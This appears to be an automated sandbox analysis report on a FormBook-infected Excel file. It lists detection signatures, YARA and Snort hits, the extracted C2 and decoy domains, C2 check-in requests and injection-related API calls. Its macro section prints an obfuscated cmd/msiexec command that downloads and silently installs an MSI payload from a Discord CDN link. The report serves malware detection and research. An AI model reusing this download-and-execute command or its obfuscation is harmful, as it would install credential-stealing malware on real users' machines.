Analysis Report 0d69e4f6_by_Libranalysis

Overview

General Information

Sample Name: 0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
Analysis ID: 402839
MD5: 0d69e4f684735cf4f187659ee0882fd8
SHA1: 55a52f6971084224e3030b76cd44d13b0203b749
SHA256: 0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: www.111bjs.com/ccr/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
Multi AV Scanner detection for submitted file
Source: 0d69e4f6_by_Libranalysis.xls ReversingLabs: Detection: 38%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 0d69e4f6_by_Libranalysis.xls Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.MSID8B1.tmp.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.MSID8B1.tmp.710000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.1.MSID8B1.tmp.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 9_2_00097D24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 9_2_00097D7A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.111bjs.com/ccr/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1 Host: www.adimadimingilizce.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1 Host: www.destek-taleplerimiz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Source: Joe Sandbox View IP Address: 99.83.154.118 99.83.154.118
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Document contains an embedded VBA macro which may execute processes
Source: 0d69e4f6_by_Libranalysis.xls OLE, VBA macro line: vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)
Source: VBA code instrumentation OLE, VBA macro: Module AK2_oiMjTt8L, Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP, API IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0:Integer) Name: WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, 7_2_008F00C4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_008F0048
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk, 7_2_008F0078
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk, 7_2_008EF9F0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk, 7_2_008EF900
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_008EFAD0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_008EFAE8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_008EFBB8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_008EFB68
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_008EFC90
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_008EFC60
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_008EFD8C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_008EFDC0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_008EFEA0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_008EFED0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_008EFFB4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F10D0 NtOpenProcessToken, 7_2_008F10D0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0060 NtQuerySection, 7_2_008F0060
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F01D4 NtSetValueKey, 7_2_008F01D4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F010C NtOpenDirectoryObject, 7_2_008F010C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1148 NtOpenThread, 7_2_008F1148
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F07AC NtCreateMutant, 7_2_008F07AC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF8CC NtWaitForSingleObject, 7_2_008EF8CC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF938 NtWriteFile, 7_2_008EF938
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1930 NtSetContextThread, 7_2_008F1930
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAB8 NtQueryValueKey, 7_2_008EFAB8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFA20 NtQueryInformationFile, 7_2_008EFA20
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFA50 NtEnumerateValueKey, 7_2_008EFA50
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFBE8 NtQueryVirtualMemory, 7_2_008EFBE8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFB50 NtCreateKey, 7_2_008EFB50
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC30 NtOpenProcess, 7_2_008EFC30
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC48 NtSetInformationFile, 7_2_008EFC48
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0C40 NtGetContextThread, 7_2_008F0C40
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1D80 NtSuspendThread, 7_2_008F1D80
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFD5C NtEnumerateKey, 7_2_008EFD5C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFE24 NtWriteVirtualMemory, 7_2_008EFE24
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFFFC NtCreateProcessEx, 7_2_008EFFFC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFF34 NtQueueApcThread, 7_2_008EFF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk, 9_2_021F00C4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk, 9_2_021F07AC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_021EFAB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_021EFAD0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_021EFAE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk, 9_2_021EFB50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_021EFB68
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_021EFBB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk, 9_2_021EF900
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk, 9_2_021EF9F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_021EFED0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk, 9_2_021EFFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_021EFC60
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk, 9_2_021EFD8C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_021EFDC0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0048 NtProtectVirtualMemory, 9_2_021F0048
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0078 NtResumeThread, 9_2_021F0078
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0060 NtQuerySection, 9_2_021F0060
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F10D0 NtOpenProcessToken, 9_2_021F10D0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F010C NtOpenDirectoryObject, 9_2_021F010C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1148 NtOpenThread, 9_2_021F1148
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F01D4 NtSetValueKey, 9_2_021F01D4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFA20 NtQueryInformationFile, 9_2_021EFA20
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFA50 NtEnumerateValueKey, 9_2_021EFA50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFBE8 NtQueryVirtualMemory, 9_2_021EFBE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF8CC NtWaitForSingleObject, 9_2_021EF8CC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF938 NtWriteFile, 9_2_021EF938
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1930 NtSetContextThread, 9_2_021F1930
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFE24 NtWriteVirtualMemory, 9_2_021EFE24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFEA0 NtReadVirtualMemory, 9_2_021EFEA0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFF34 NtQueueApcThread, 9_2_021EFF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFFFC NtCreateProcessEx, 9_2_021EFFFC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC30 NtOpenProcess, 9_2_021EFC30
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC48 NtSetInformationFile, 9_2_021EFC48
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0C40 NtGetContextThread, 9_2_021F0C40
